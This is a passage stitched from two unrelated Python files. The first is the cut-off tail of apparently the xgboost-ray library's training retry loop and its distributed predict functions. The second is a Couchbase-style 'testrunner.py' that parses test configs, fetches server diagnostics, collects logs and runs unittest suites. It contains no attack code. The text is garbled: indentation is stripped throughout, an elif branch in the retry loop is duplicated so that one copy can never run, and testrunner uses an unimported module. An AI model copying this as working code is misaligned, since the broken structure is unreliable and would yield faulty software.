f"start {len(start_actor_ranks)} new actors. "
f"Sleeping for 10 seconds for cleanup.")
tries -= 1 # This is deliberate so shouldn't count
start_again = True
elif tries + 1 <= max_actor_restarts:
if exc.__cause__ and isinstance(exc.__cause__,
RayXGBoostTrainingError):
logger.warning(f"Caught exception: {exc.__cause__}")
logger.warning(
f"A Ray actor died during training. Trying to "
f"continue training on the remaining actors. "
f"This will use {alive_actors} existing actors and "
f"start {len(start_actor_ranks)} new actors. "
f"Sleeping for 10 seconds for cleanup.")
start_again = True
elif tries + 1 <= max_actor_restarts:
if exc.__cause__ and isinstance(exc.__cause__,
RayXGBoostTrainingError):
logger.warning(f"Caught exception: {exc.__cause__}")
logger.warning(
f"A Ray actor died during training. Trying to restart "
f"and continue training from last checkpoint "
f"(restart {tries + 1} of {max_actor_restarts}). "
f"This will use {alive_actors} existing actors and start "
f"{len(start_actor_ranks)} new actors. "
f"Sleeping for 10 seconds for cleanup.")
start_again = True
if start_again:
time.sleep(5)
queue.shutdown()
stop_event.shutdown()
time.sleep(5)
queue, stop_event = _create_communication_processes()
else:
raise RuntimeError(
f"A Ray actor died during training and the maximum number "
f"of retries ({max_actor_restarts}) is exhausted."
) from exc
tries += 1
total_time = time.time() - start_time
train_additional_results["training_time_s"] = total_training_time
train_additional_results["total_time_s"] = total_time
logger.info("[RayXGBoost] Finished XGBoost training on training data "
"with total N={total_n:,} in {total_time_s:.2f} seconds "
"({training_time_s:.2f} pure XGBoost training time).".format(
**train_additional_results))
_shutdown(
actors=actors,
pending_actors=pending_actors,
queue=queue,
event=stop_event,
placement_group=pg,
force=False)
if isinstance(evals_result, dict):
evals_result.update(train_evals_result)
if isinstance(additional_results, dict):
additional_results.update(train_additional_results)
return bst
def _predict(model: xgb.Booster, data: RayDMatrix, ray_params: RayParams,
**kwargs):
_assert_ray_support()
if not ray.is_initialized():
ray.init()
# Create remote actors
actors = [
_create_actor(
rank=i,
num_actors=ray_params.num_actors,
num_cpus_per_actor=ray_params.cpus_per_actor,
num_gpus_per_actor=ray_params.gpus_per_actor
if ray_params.gpus_per_actor >= 0 else 0,
resources_per_actor=ray_params.resources_per_actor,
distributed_callbacks=ray_params.distributed_callbacks)
for i in range(ray_params.num_actors)
]
logger.info(f"[RayXGBoost] Created {len(actors)} remote actors.")
# Split data across workers
wait_load = []
for actor in actors:
wait_load.extend(_trigger_data_load(actor, data, []))
try:
ray.get(wait_load)
except Exception as exc:
logger.warning(f"Caught an error during prediction: {str(exc)}")
_shutdown(actors, force=True)
raise
# Put model into object store
model_ref = ray.put(model)
logger.info("[RayXGBoost] Starting XGBoost prediction.")
# Train
fut = [actor.predict.remote(model_ref, data, **kwargs) for actor in actors]
try:
actor_results = ray.get(fut)
except Exception as exc:
logger.warning(f"Caught an error during prediction: {str(exc)}")
_shutdown(actors=actors, force=True)
raise
_shutdown(actors=actors, force=False)
return combine_data(data.sharding, actor_results)
@PublicAPI(stability="beta")
def predict(model: xgb.Booster,
data: RayDMatrix,
ray_params: Union[None, RayParams, Dict] = None,
_remote: Optional[bool] = None,
**kwargs) -> Optional[np.ndarray]:
"""Distributed XGBoost predict via Ray.
This function will connect to a Ray cluster, create ``num_actors``
remote actors, send data shards to them, and have them predict labels
using an XGBoost booster model. The results are then combined and
returned.
Args:
model (xgb.Booster): Booster object to call for prediction.
data (RayDMatrix): Data object containing the prediction data.
ray_params (Union[None, RayParams, Dict]): Parameters to configure
Ray-specific behavior. See :class:`RayParams` for a list of valid
configuration parameters.
_remote (bool): Whether to run the driver process in a remote
function. This is enabled by default in Ray client mode.
**kwargs: Keyword arguments will be passed to the local
`xgb.predict()` calls.
Returns: ``np.ndarray`` containing the predicted labels.
"""
os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")
if xgb is None:
raise ImportError(
"xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
"FIX THIS by running `pip install \"xgboost-ray\"`.")
if _remote is None:
_remote = _is_client_connected() and \
not is_session_enabled()
if not ray.is_initialized():
ray.init()
if _remote:
return ray.get(
ray.remote(num_cpus=0)(predict).remote(
model, data, ray_params, _remote=False, **kwargs))
_maybe_print_legacy_warning()
ray_params = _validate_ray_params(ray_params)
max_actor_restarts = ray_params.max_actor_restarts \
if ray_params.max_actor_restarts >= 0 else float("inf")
_assert_ray_support()
if not isinstance(data, RayDMatrix):
raise ValueError(
"The `data` argument passed to `train()` is not a RayDMatrix, "
"but of type {}. "
"\nFIX THIS by instantiating a RayDMatrix first: "
"`data = RayDMatrix(data=data)`.".format(type(data)))
tries = 0
while tries <= max_actor_restarts:
try:
return _predict(model, data, ray_params=ray_params, **kwargs)
except RayActorError:
if tries + 1 <= max_actor_restarts:
logger.warning(
"A Ray actor died during prediction. Trying to restart "
"prediction from scratch. "
"Sleeping for 10 seconds for cleanup.")
time.sleep(10)
else:
raise RuntimeError(
"A Ray actor died during prediction and the maximum "
"number of retries ({}) is exhausted.".format(
max_actor_restarts))
tries += 1
return None
|
testrunner.py | #!/usr/bin/env python3
import base64
import gzip
from http.client import BadStatusLine
import os
import urllib.request, urllib.error, urllib.parse
import sys
import threading
from os.path import basename, splitext
from multiprocessing import Process
from pprint import pprint
sys.path = ["lib", "pytests", "pysystests"] + sys.path
if sys.hexversion < 0x30706f0:
sys.exit("Testrunner requires version 3.7.6+ of python (found: " + sys.version + ")")
import re
import time
import unittest
import logging.config
from threading import Thread, Event
from xunit import XUnitTestResult
from TestInput import TestInputParser, TestInputSingleton
from optparse import OptionParser, OptionGroup
from scripts.collect_server_info import cbcollectRunner, couch_dbinfo_Runner
from scripts.measure_sched_delays import SchedDelays
from scripts.getcoredumps import Getcoredumps, Clearcoredumps
import signal
import shutil
import glob
import xml.dom.minidom
import logging
from remote.remote_util import RemoteMachineShellConnection
log = logging.getLogger(__name__)
logging.info(__name__)
print("*** TestRunner ***")
def usage(err=None):
print("""\
Syntax: testrunner [options]
Examples:
./testrunner -i tmp/local.ini -t performance.perf.DiskDrainRate
./testrunner -i tmp/local.ini -t performance.perf.DiskDrainRate.test_9M
""")
sys.exit(0)
def parse_args(argv):
parser = OptionParser()
parser.add_option("-q", action="store_false", dest="verbose")
tgroup = OptionGroup(parser, "TestCase/Runlist Options")
tgroup.add_option("-i", "--ini", dest="ini",
help="Path to .ini file containing server information,e.g -i tmp/local.ini")
tgroup.add_option("-c", "--config", dest="conf",
help="Config file name (located in the conf subdirectory), "
"e.g -c py-view.conf")
tgroup.add_option("-t", "--test", dest="testcase",
help="Test name (multiple -t options add more tests) e.g -t "
"performance.perf.DiskDrainRate")
tgroup.add_option("-d", "--include_tests", dest="include_tests",
help="Value can be 'failed' (or) 'passed' (or) 'failed=<junit_xml_path (or) "
"jenkins_build_url>' (or) 'passed=<junit_xml_path or "
"jenkins_build_url>' (or) 'file=<filename>' (or) '<regular "
"expression>' to include tests in the run. Use -g option to search "
"entire conf files. e.g. -d 'failed' or -d 'failed=report.xml' or -d "
"'^gsi.*nodes_init=2.*'")
tgroup.add_option("-e", "--exclude_tests", dest="exclude_tests",
help="Value can be 'failed' (or) 'passed' (or) 'failed=<junit_xml_path (or) "
"jenkins_build_url>' (or) 'passed=<junit_xml_path (or) "
"jenkins_build_url>' or 'file=<filename>' (or) '<regular expression>' "
"to exclude tests in the run. Use -g option to search entire conf "
"files. e.g. -e 'passed'")
tgroup.add_option("-r", "--rerun", dest="rerun",
help="Rerun fail or pass tests with given =count number of times maximum. "
"\ne.g. -r 'fail=3'")
tgroup.add_option("-g", "--globalsearch", dest="globalsearch",
help="Option to get tests from given conf file path pattern, "
"like conf/**/*.conf. Useful for include or exclude conf files to "
"filter tests. e.g. -g 'conf/**/.conf'",
default="")
tgroup.add_option("-m", "--merge", dest="merge",
help="Merge the report files path pattern, like logs/**/.xml. e.g. -m '["
"logs/**/*.xml]'",
default="")
parser.add_option_group(tgroup)
parser.add_option("-p", "--params", dest="params",
help="Optional key=value parameters, comma-separated -p k=v,k2=v2,...",
default="")
parser.add_option("-n", "--noop", action="store_true",
help="NO-OP - emit test names, but don't actually run them e.g -n true")
parser.add_option("-l", "--log-level", dest="loglevel", default="INFO",
help="e.g -l info,warning,error")
options, args = parser.parse_args()
tests = []
test_params = {}
setLogLevel(options.loglevel)
log.info("Checking arguments...")
if not options.ini:
parser.error("Please specify an .ini file (-i) option.")
parser.print_help()
else:
test_params['ini'] = options.ini
if not os.path.exists(options.ini):
sys.exit("ini file {0} was not found".format(options.ini))
test_params['cluster_name'] = splitext(os.path.basename(options.ini))[0]
if not options.testcase and not options.conf and not options.globalsearch and not options.include_tests and not options.exclude_tests:
parser.error("Please specify a configuration file (-c) or a test case (-t) or a globalsearch (-g) option.")
parser.print_help()
if options.conf and not options.globalsearch:
parse_conf_file(options.conf, tests, test_params)
if options.globalsearch:
parse_global_conf_file(options.globalsearch, tests, test_params)
if options.include_tests:
tests = process_include_or_filter_exclude_tests("include", options.include_tests, tests,
options)
if options.exclude_tests:
tests = process_include_or_filter_exclude_tests("exclude", options.exclude_tests, tests, options)
if options.testcase:
tests.append(options.testcase)
if options.noop:
print(("---\n"+"\n".join(tests)+"\n---\nTotal="+str(len(tests))))
sys.exit(0)
return tests, test_params, options.ini, options.params, options
def setLogLevel(log_level):
if log_level and log_level.lower() == 'info':
log.setLevel(logging.INFO)
elif log_level and log_level.lower() == 'warning':
log.setLevel(logging.WARNING)
elif log_level and log_level.lower() == 'debug':
log.setLevel(logging.DEBUG)
elif log_level and log_level.lower() == 'critical':
log.setLevel(logging.CRITICAL)
elif log_level and log_level.lower() == 'fatal':
log.setLevel(logging.FATAL)
else:
log.setLevel(logging.NOTSET)
def process_include_or_filter_exclude_tests(filtertype, option, tests, options):
if filtertype == 'include' or filtertype == 'exclude':
if option.startswith('failed') or option.startswith('passed') or option.startswith("http://") or option.startswith("https://"):
passfail = option.split("=")
tests_list = []
if len(passfail) == 2:
if passfail[1].startswith("http://") or passfail[1].startswith("https://"):
tp, tf = parse_testreport_result_xml(passfail[1])
else:
tp, tf = parse_junit_result_xml(passfail[1])
if not tp and not tf:
tp, tf = parse_testreport_result_xml(passfail[1])
elif option.startswith("http://") or option.startswith("https://"):
tp, tf = parse_testreport_result_xml(option)
tests_list=tp+tf
else:
tp, tf = parse_junit_result_xml()
if not tp and not tf:
tp, tf = parse_testreport_result_xml()
if tp is None and tf is None:
return tests
if option.startswith('failed') and tf:
tests_list = tf
elif option.startswith('passed') and tp:
tests_list = tp
if filtertype == 'include':
tests = tests_list
else:
for line in tests_list:
isexisted, t = check_if_exists_with_params(tests, line, options.params)
if isexisted:
tests.remove(t)
elif option.startswith("file="):
filterfile = locate_conf_file(option.split("=")[1])
if filtertype == 'include':
tests_list = []
if filterfile:
for line in filterfile:
tests_list.append(line.strip())
tests = tests_list
else:
for line in filterfile:
isexisted, t = check_if_exists_with_params(tests, line.strip(), options.params)
if isexisted:
tests.remove(t)
else: # pattern
if filtertype == 'include':
tests = [i for i in tests if re.search(option, i)]
else:
tests = [i for i in tests if not re.search(option, i)]
else:
log.warning("Warning: unknown filtertype given (only include/exclude supported)!")
return tests
def create_log_file(log_config_file_name, log_file_name, level):
tmpl_log_file = open("logging.conf.sample")
log_file = open(log_config_file_name, "w")
log_file.truncate()
for line in tmpl_log_file:
newline = line.replace("@@LEVEL@@", level)
newline = newline.replace("@@FILENAME@@", log_file_name.replace('\\', '/'))
log_file.write(newline)
log_file.close()
tmpl_log_file.close()
def append_test(tests, name):
prefix = ".".join(name.split(".")[0:-1])
"""
Some tests carry special chars, need to skip it
"""
if "test_restore_with_filter_regex" not in name and \
"test_restore_with_rbac" not in name and \
"test_backup_with_rbac" not in name and \
"test_add_node_with_cert_diff_services" not in name and \
"test_add_nodes_x509_rebalance" not in name and \
"test_init_nodes_x509" not in name and \
name.find('*') > 0:
for t in unittest.TestLoader().loadTestsFromName(name.rstrip('.*')):
tests.append(prefix + '.' + t._testMethodName)
else:
tests.append(name)
def locate_conf_file(filename):
log.info("Conf filename: %s" % filename)
if filename:
if os.path.exists(filename):
return open(filename)
if os.path.exists("conf{0}{1}".format(os.sep, filename)):
return open("conf{0}{1}".format(os.sep, filename))
return None
def parse_conf_file(filename, tests, params):
"""Parse a configuration file.
Configuration files contain information and parameters about test execution.
Should follow the following order:
Part1: Tests to execute.
Part2: Parameters to override the defaults.
@e.x:
TestModuleName1:
TestName1
TestName2
....
TestModuleName2.TestName3
TestModuleName2.TestName4
...
params:
items=4000000
num_creates=400000
....
"""
f = locate_conf_file(filename)
if not f:
usage("unable to locate configuration file: " + filename)
prefix = None
for line in f:
stripped = line.strip()
if stripped.startswith("#") or len(stripped) <= 0:
continue
if stripped.endswith(":"):
prefix = stripped.split(":")[0]
log.info("Test prefix: {0}".format(prefix))
continue
name = stripped
if prefix and prefix.lower() == "params":
args = stripped.split("=", 1)
if len(args) == 2:
params[args[0]] = args[1]
continue
elif line.startswith(" ") and prefix:
name = prefix + "." + name
prefix = ".".join(name.split(",")[0].split('.')[0:-1])
append_test(tests, name)
# If spec parameter isn't defined, testrunner uses the *.conf filename for
# the spec value
if 'spec' not in params:
params['spec'] = splitext(basename(filename))[0]
params['conf_file'] = filename
def parse_global_conf_file(dirpath, tests, params):
log.info("dirpath="+dirpath)
if os.path.isdir(dirpath):
dirpath=dirpath+os.sep+"**"+os.sep+"*.conf"
log.info("Global filespath=" + dirpath)
conf_files = glob.glob(dirpath)
for file in conf_files:
parse_conf_file(file, tests, params)
def check_if_exists(test_list, test_line):
new_test_line = ''.join(sorted(test_line))
for t in test_list:
t1 = ''.join(sorted(t))
if t1 == new_test_line:
return True, t
return False, ""
def check_if_exists_with_params(test_list, test_line, test_params):
new_test_line = ''.join(sorted(test_line))
for t in test_list:
if test_params:
t1 = ''.join(sorted(t+","+test_params.strip()))
else:
t1 = ''.join(sorted(t))
if t1 == new_test_line:
return True, t
return False, ""
def transform_and_write_to_file(tests_list, filename):
new_test_list = []
for test in tests_list:
line = filter_fields(test)
line = line.rstrip(",")
isexisted, _ = check_if_exists(new_test_list, line)
if not isexisted:
new_test_list.append(line)
file = open(filename, "w+")
for line in new_test_list:
file.writelines((line) + "\n")
file.close()
return new_test_list
def getNodeText(nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
def parse_testreport_result_xml(filepath=""):
if filepath.startswith("http://") or filepath.startswith("https://"):
if filepath.endswith(".xml"):
url_path = filepath
else:
url_path = filepath+"/testReport/api/xml?pretty=true"
jobnamebuild = filepath.split('/')
if not os.path.exists('logs'):
os.mkdir('logs')
newfilepath = 'logs'+''.join(os.sep)+'_'.join(jobnamebuild[-3:])+"_testresult.xml"
log.info("Downloading " + url_path +" to "+newfilepath)
try:
filedata = urllib.request.urlopen(url_path)
datatowrite = filedata.read()
filepath = newfilepath
with open(filepath, 'wb') as f:
f.write(datatowrite)
except Exception as ex:
log.error("Error:: "+str(ex)+"! Please check if " +
url_path + " URL is accessible!!")
log.info("Running all the tests instead for now.")
return None, None
if filepath == "":
filepath = "logs/**/*.xml"
log.info("Loading result data from "+filepath)
xml_files = glob.glob(filepath)
passed_tests=[]
failed_tests=[]
for xml_file in xml_files:
log.info("-- "+xml_file+" --")
doc = xml.dom.minidom.parse(xml_file)
testresultelem = doc.getElementsByTagName("testResult")
testsuitelem = testresultelem[0].getElementsByTagName("suite")
for ts in testsuitelem:
testcaseelem = ts.getElementsByTagName("case")
for tc in testcaseelem:
tcname = getNodeText((tc.getElementsByTagName("name")[0]).childNodes)
tcstatus = getNodeText((tc.getElementsByTagName("status")[0]).childNodes)
if tcstatus == 'PASSED':
failed=False
passed_tests.append(tcname)
else:
failed=True
failed_tests.append(tcname)
if failed_tests:
failed_tests = transform_and_write_to_file(failed_tests,"failed_tests.conf")
if passed_tests:
passed_tests = transform_and_write_to_file(passed_tests, "passed_tests.conf")
return passed_tests, failed_tests
def parse_junit_result_xml(filepath=""):
if filepath.startswith("http://") or filepath.startswith("https://"):
return parse_testreport_result_xml(filepath)
if filepath == "":
filepath = "logs/**/*.xml"
log.info("Loading result data from "+filepath)
xml_files = glob.glob(filepath)
passed_tests=[]
failed_tests=[]
for xml_file in xml_files:
log.info("-- "+xml_file+" --")
doc = xml.dom.minidom.parse(xml_file)
testsuitelem = doc.getElementsByTagName("testsuite")
for ts in testsuitelem:
tsname = ts.getAttribute("name")
testcaseelem = ts.getElementsByTagName("testcase")
failed=False
for tc in testcaseelem:
tcname = tc.getAttribute("name")
tcerror = tc.getElementsByTagName("error")
for tce in tcerror:
failed_tests.append(tcname)
failed = True
if not failed:
passed_tests.append(tcname)
if failed_tests:
failed_tests = transform_and_write_to_file(failed_tests,"failed_tests.conf")
if passed_tests:
passed_tests = transform_and_write_to_file(passed_tests, "passed_tests.conf")
return passed_tests, failed_tests
def create_headers(username, password):
#authorization = base64.encodebytes('%s:%s' % (username, password))
authorization = base64.encodebytes(('%s:%s' % (username, password)).encode()).decode()
authorization=authorization.rstrip('\n')
return {'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic %s' % authorization,
'Accept': '*/*'}
def get_server_logs(input, path):
for server in input.servers:
log.info("grabbing diags from ".format(server.ip))
diag_url = "http://{0}:{1}/diag".format(server.ip, server.port)
log.info(diag_url)
try:
req = urllib.request.Request(diag_url)
req.headers = create_headers(input.membase_settings.rest_username,
input.membase_settings.rest_password)
filename = "{0}/{1}-diag.txt".format(path, server.ip)
page = urllib.request.urlopen(req, timeout=60)
with open(filename, 'wb') as output:
os.write(1, "downloading {0} ...".format(str(server.ip)).encode())
while True:
buffer = page.read(65536)
if not buffer:
break
output.write(buffer)
os.write(1, ".".encode())
file_input = open('{0}'.format(filename), 'rb')
zipped = gzip.open("{0}.gz".format(filename), 'wb')
zipped.writelines(file_input)
file_input.close()
zipped.close()
os.remove(filename)
log.info("downloaded and zipped diags @ : {0}".format("{0}.gz".format(filename)))
except urllib.error.URLError:
log.error("unable to obtain diags from %s" % diag_url)
except BadStatusLine:
log.error("unable to obtain diags from %s" % diag_url)
except Exception as e:
log.error("unable to obtain diags from %s %s" % (diag_url, e))
def get_logs_cluster_run(input, path, ns_server_path):
print("grabbing logs (cluster-run)")
path = path or "."
logs_path = ns_server_path + os.sep + "logs"
try:
shutil.make_archive(path + os.sep + "logs", 'zip', logs_path)
except Exception as e:
log.error("NOT POSSIBLE TO GRAB LOGS (CLUSTER_RUN)")
def get_cbcollect_info(input, path):
runner = cbcollectRunner(input.servers, path)
runner.run()
for (server, e) in runner.fail:
log.error("NOT POSSIBLE TO GRAB CBCOLLECT FROM {0}: {1}".format(server.ip, e))
def get_couch_dbinfo(input, path):
for server in input.servers:
print(("grabbing dbinfo from {0}".format(server.ip)))
path = path or "."
try:
couch_dbinfo_Runner(server, path).run()
except Exception as e:
log.error("NOT POSSIBLE TO GRAB dbinfo FROM {0}: {1}".format(server.ip, e))
def clear_old_core_dumps(_input, path):
for server in _input.servers:
path = path or "."
try:
Clearcoredumps(server, path).run()
except Exception as e:
log.error("Unable to clear core dumps on {0} : {1}".format(server.ip, e))
def get_core_dumps(_input, path):
ret = False
for server in _input.servers:
print(("grabbing core dumps files from {0}".format(server.ip)))
path = path or "."
try:
if Getcoredumps(server, path).run():
ret = True
except Exception as e:
log.error("NOT POSSIBLE TO GRAB CORE DUMPS FROM {0} : {1}".\
format(server.ip, e))
return ret
class StoppableThreadWithResult(Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None, verbose=None):
super(StoppableThreadWithResult, self).__init__(group=group, target=target,
name=name, args=args, kwargs=kwargs)
self._stopper = Event()
def stopit(self):
self._stopper.set()
self._Thread__stop()
def stopped(self):
return self._stopper.isSet()
def run(self):
if self._target is not None:
self._return = self._target(*self._args,
**self._kwargs)
def join(self, timeout=None):
Thread.join(self, timeout=None)
return self._return
def runtests(names, options, arg_i, arg_p, runtime_test_params):
log.info("\nNumber of tests initially selected before GROUP filters: " + str(len(names)))
BEFORE_SUITE = "suite_setUp"
AFTER_SUITE = "suite_tearDown"
xunit = XUnitTestResult()
# Create root logs directory
abs_path = os.path.dirname(os.path.abspath(sys.argv[0]))
# Create testrunner logs subdirectory
str_time = time.strftime("%y-%b-%d_%H-%M-%S", time.localtime())
root_log_dir = os.path.join(abs_path, "logs{0}testrunner-{1}".format(os.sep, str_time))
if not os.path.exists(root_log_dir):
os.makedirs(root_log_dir)
results = []
case_number = 1
last_case_fail = False
base_tear_down_run = TestInputSingleton.input.param('teardown_run', False)
if "GROUP" in runtime_test_params:
print(("Only cases in GROUPs '{0}' will be executed".format(runtime_test_params["GROUP"])))
if "EXCLUDE_GROUP" in runtime_test_params:
print(("Cases from GROUPs '{0}' will be excluded".format(runtime_test_params["EXCLUDE_GROUP"])))
if TestInputSingleton.input.param("get-delays", False):
# start measure_sched_delays on all servers
sd = SchedDelays(TestInputSingleton.input.servers)
sd.start_measure_sched_delays()
if TestInputSingleton.input.param("hanging_threads", False):
print("--> hanging_threads: start monitoring...")
from hanging_threads import start_monitoring
hanging_threads_frozen_time = int(TestInputSingleton.input.param("hanging_threads", 120))
hanging_threads_test_interval = int(TestInputSingleton.input.param("test_interval", 1000))
monitoring_thread = start_monitoring(seconds_frozen=hanging_threads_frozen_time, test_interval=hanging_threads_test_interval)
logs_folder="."
test_exec_count=0
for name in names:
start_time = time.time()
argument_split = [a.strip() for a in re.split("[,]?([^,=]+)=", name)[1:]]
params = dict(list(zip(argument_split[::2], argument_split[1::2])))
# Note that if ALL is specified at runtime then tests which have no groups are still run - just being
# explicit on this
if "GROUP" in runtime_test_params and "ALL" not in runtime_test_params["GROUP"].split(";"):
if 'GROUP' not in params: # params is the .conf file parameters.
# this test is not in any groups so we do not run it
print(("test '{0}' skipped, a group was requested and this is not any groups".format(name)))
continue
# there is a group for this test case, if that group is not specified at run time then do not run it
elif not set(runtime_test_params["GROUP"].split(";")).issubset(set(params["GROUP"].split(";"))):
print(("test '{0}' skipped, is not in the requested group".format(name)))
continue
else:
pass # the test was in requested group, will run it
elif "EXCLUDE_GROUP" in runtime_test_params:
if 'GROUP' in params and \
set(runtime_test_params["EXCLUDE_GROUP"].split(";")).issubset(set(params["GROUP"].split(";"))):
print(("test '{0}' skipped, is in an excluded group".format(name)))
continue
log.info("--> Running test: {}".format(name))
test_exec_count += 1
# Create Log Directory
logs_folder = os.path.join(root_log_dir, "test_%s" % case_number)
log.info("Logs folder: {}".format(logs_folder))
os.mkdir(logs_folder)
test_log_file = os.path.join(logs_folder, "test.log")
log_config_filename = r'{0}'.format(os.path.join(logs_folder, "test.logging.conf"))
create_log_file(log_config_filename, test_log_file, options.loglevel)
logging.config.fileConfig(log_config_filename)
print(("Logs will be stored at {0}".format(logs_folder)))
print(("\n.{3}testrunner -i {0} -p {1} -t {2}\n"\
.format(arg_i or "", arg_p or "", name, os.sep)))
name = name.split(",")[0]
# Update the test params for each test
TestInputSingleton.input.test_params = params
TestInputSingleton.input.test_params.update(runtime_test_params)
TestInputSingleton.input.test_params["case_number"] = case_number
TestInputSingleton.input.test_params["last_case_fail"] = \
str(last_case_fail)
TestInputSingleton.input.test_params["teardown_run"] = \
str(base_tear_down_run)
TestInputSingleton.input.test_params["logs_folder"] = logs_folder
print("Test Input params:")
print((TestInputSingleton.input.test_params))
if "get-coredumps" in TestInputSingleton.input.test_params:
if TestInputSingleton.input.param("get-coredumps", True):
clear_old_core_dumps(TestInputSingleton.input, logs_folder)
if case_number == 1 and "upgrade" not in name and "xdcr" not in name:
before_suite_name = "%s.%s" % (name[:name.rfind('.')], BEFORE_SUITE)
try:
print(("Run before suite setup for %s" % name))
suite = unittest.TestLoader().loadTestsFromName(before_suite_name)
print(("-->before_suite_name:{},suite: {}".format(before_suite_name,suite)))
result = unittest.TextTestRunner(verbosity=2).run(suite)
print(("-->result: {}".format(result)))
if "get-coredumps" in TestInputSingleton.input.test_params:
if TestInputSingleton.input.param("get-coredumps", True):
if get_core_dumps(TestInputSingleton.input, logs_folder):
result = unittest.TextTestRunner(verbosity=2)._makeResult()
result.errors = [(name, "Failing test : new core dump(s) "
"were found and collected."
" Check testrunner logs folder.")]
log.info("FAIL: New core dump(s) was found and collected")
except AttributeError as ex:
traceback.print_exc()
pass
try:
suite = unittest.TestLoader().loadTestsFromName(name)
except AttributeError as e:
print(("Test {0} was not found: {1}".format(name, e)))
result = unittest.TextTestRunner(verbosity=2)._makeResult()
result.errors = [(name, str(e))]
except SyntaxError as e:
print(("SyntaxError in {0}: {1}".format(name, e)))
result = unittest.TextTestRunner(verbosity=2)._makeResult()
result.errors = [(name, str(e))]
else:
test_timeout = TestInputSingleton.input.param("test_timeout", None)
t = StoppableThreadWithResult(target=unittest.TextTestRunner(verbosity=2).run,
name="test_thread",
args=(suite))
t.start()
result = t.join(timeout=test_timeout)
if "get-coredumps" in TestInputSingleton.input.test_params:
if TestInputSingleton.input.param("get-coredumps", True):
if get_core_dumps(TestInputSingleton.input, logs_folder):
result = unittest.TextTestRunner(verbosity=2)._makeResult()
result.errors = [(name, "Failing test : new core dump(s) "
"were found and collected."
" Check testrunner logs folder.")]
log.info("FAIL: New core dump(s) was found and collected")
if not result:
for t in threading.enumerate():
if t != threading.current_thread():
t._Thread__stop()
result = unittest.TextTestRunner(verbosity=2)._makeResult()
case_number += 1000
print ("========TEST WAS STOPPED DUE TO TIMEOUT=========")
result.errors = [(name, "Test was stopped due to timeout")]
time_taken = time.time() - start_time
# Concat params to test name
# To make tests more readable
params = ''
if TestInputSingleton.input.test_params:
for key, value in list(TestInputSingleton.input.test_params.items()):
if key and value:
params += "," + str(key) + "=" + str(value)
base_tear_down_run = TestInputSingleton.input.param(
'teardown_run', False)
if result.failures or result.errors:
# Immediately get the server logs, if
# the test has failed or has errors
last_case_fail = True
if "get-logs" in TestInputSingleton.input.test_params:
get_server_logs(TestInputSingleton.input, logs_folder)
if "get-logs-cluster-run" in TestInputSingleton.input.test_params:
if TestInputSingleton.input.param("get-logs-cluster-run", True):
# Generate path to ns_server directory
ns_server_path = os.path.normpath(abs_path + os.sep + os.pardir + os.sep + "ns_server")
get_logs_cluster_run(TestInputSingleton.input, logs_folder, ns_server_path)
if "get-cbcollect-info" in TestInputSingleton.input.test_params:
if TestInputSingleton.input.param("get-cbcollect-info", True):
get_cbcollect_info(TestInputSingleton.input, logs_folder)
if "get-couch-dbinfo" in TestInputSingleton.input.test_params and \
TestInputSingleton.input.param("get-couch-dbinfo", True):
get_couch_dbinfo(TestInputSingleton.input, logs_folder)
errors = []
for failure in result.failures:
test_case, failure_string = failure
errors.append(failure_string)
break
for error in result.errors:
test_case, error_string = error
errors.append(error_string)
break
xunit.add_test(name=name, status='fail', time=time_taken,
errorType='membase.error', errorMessage=str(errors),
params=params)
results.append({"result": "fail", "name": name})
else:
last_case_fail = False
xunit.add_test(name=name, time=time_taken, params=params)
results.append({"result": "pass", "name": name, "time": time_taken})
xunit.write("{0}{2}report-{1}".format(os.path.dirname(logs_folder), str_time, os.sep))
xunit.print_summary()
print(("testrunner logs, diags and results are available under {0}".format(logs_folder)))
case_number += 1
if (result.failures or result.errors) and \
TestInputSingleton.input.param("stop-on-failure", False):
print("test fails, all of the following tests will be skipped!!!")
break
print("\n*** Tests executed count: {}\n".format(test_exec_count))
if test_exec_count > 0 and "upgrade" not in name:
after_suite_name = "%s.%s" % (name[:name.rfind('.')], AFTER_SUITE)
try:
print(("Run after suite setup for %s" % name))
suite = unittest.TestLoader().loadTestsFromName(after_suite_name)
result = unittest.TextTestRunner(verbosity=2).run(suite)
except AttributeError as ex:
pass
if "makefile" not in TestInputSingleton.input.test_params:
print("During the test, Remote Connections: %s, Disconnections: %s" %
(RemoteMachineShellConnection.connections,
RemoteMachineShellConnection.disconnections))
if TestInputSingleton.input.param("get-delays", False):
sd.stop_measure_sched_delay()
sd.fetch_logs()
# terminate any non main thread - these were causing hangs
for t in threading.enumerate():
if t.name != 'MainThread' and t.is_alive():
print(('Thread', t, 'was not properly terminated, will be terminated now.'))
if hasattr(t, 'shutdown'):
print("Shutting down the thread...")
t.shutdown(True)
else:
print("Stopping the thread...")
try:
t._stop()
except Exception as e:
print("Unable to stop hung thread, killing python process")
os.kill(os.getpid(), signal.SIGKILL)
if "makefile" in TestInputSingleton.input.test_params:
# print out fail for those tests which failed and do sys.exit() error code
fail_count = 0
for result in results:
if result["result"] == "fail":
print((result["name"], " fail "))
fail_count += 1
else:
print((result["name"], " pass"))
if fail_count > 0:
sys.exit(1)
return results, xunit, "{0}{2}report-{1}".format(os.path.dirname(logs_folder), str_time, os.sep)
def filter_fields(testname):
# TODO: Fix for old xml style
if "logs_folder:" in testname:
testwords = testname.split(",")
line = ""
for fw in testwords:
if not fw.startswith("logs_folder") and not fw.startswith("conf_file") \
and not fw.startswith("cluster_name:") \
and not fw.startswith("ini:") \
and not fw.startswith("case_number:") \
and not fw.startswith("num_nodes:") \
and not fw.startswith("spec:") \
and not fw.startswith("last_case_fail:") \
and not fw.startswith("teardown_run:"):
if not "\":" in fw or "query:" in fw:
#log.info("Replacing : with ={}".format(fw))
line = line + fw.replace(":", "=", 1)
else:
line = line + fw
if fw != testwords[-1]:
line = line + ","
return line
else:
testwords = testname.split(",")
line = []
for fw in testwords:
if not fw.startswith("logs_folder=") and not fw.startswith("conf_file=") \
and not fw.startswith("cluster_name=") \
and not fw.startswith("ini=") \
and not fw.startswith("case_number=") \
and not fw.startswith("num_nodes=") \
and not fw.startswith("spec=") \
and not fw.startswith("last_case_fail=") \
and not fw.startswith("teardown_run="):
line.append(fw)
return ",".join(line)
def compare_with_sort(dict, key):
for k in list(dict.keys()):
